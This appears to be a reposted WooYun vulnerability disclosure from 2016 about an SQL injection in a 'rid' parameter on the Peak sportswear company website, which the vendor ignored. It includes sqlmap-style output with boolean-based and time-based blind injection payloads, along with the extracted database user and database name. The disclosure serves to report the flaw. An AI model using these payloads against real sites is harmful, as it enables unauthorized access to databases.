匹克官网一处SQL注入漏洞

admin

141216
文章

117
评论

2017年4月21日23:56:52评论327 views字数 224阅读0分44秒阅读模式

摘要

2016-04-20：细节已通知厂商并且等待厂商处理中
2016-04-20：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-25：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-198450

漏洞标题：匹克官网一处SQL注入漏洞

漏洞作者：路人甲

提交时间： 2016-04-20 12:09

公开时间： 2016-04-25 12:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql sql注入

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

mask 区域

*****ect=%E5%8C%BA%E5%9F%9F%E7%BB*****

注入点：rid

报错信息

验证漏洞存在

code 区域

--- 
 Parameter: rid(GET) 
 Type: boolean-based blind 
 Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause 
 Payload: rid=200 RLIKE (SELECT (CASE WHEN (5144=5144) THEN 872 ELSE 0x28 END)) Type: AND/OR time-based blind 
 Title: MySQL >= 5.0.12 RLIKE time-based blind 
 Payload: rid=200 RLIKE SLEEP(5) 
 --- 
 web application technology: Nginx 
 back-end DBMS: MySQL 5.0.12

current-user

code 区域

pike%@

current-db

code 区域

peaksport_team

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-25 12:10

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共3人评价):

登陆后才能进行评分

100%

评价

2016-04-26 12:39 | adminss ( 路人 | Rank:24 漏洞数:19 | 攒攒漏洞，冲击普通白帽)

0

我也找到了，结果没提交

1# 回复此人

漏洞概要 关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-198450

漏洞标题： 匹克官网一处SQL注入漏洞

相关厂商： epeaksport.com

漏洞作者： 路人甲

提交时间： 2016-04-20 12:09

公开时间： 2016-04-25 12:10

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 10

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql sql注入

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(4) 关注此漏洞

漏洞标题：匹克官网一处SQL注入漏洞

漏洞作者：路人甲

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共3人评价):

登陆后才能进行评分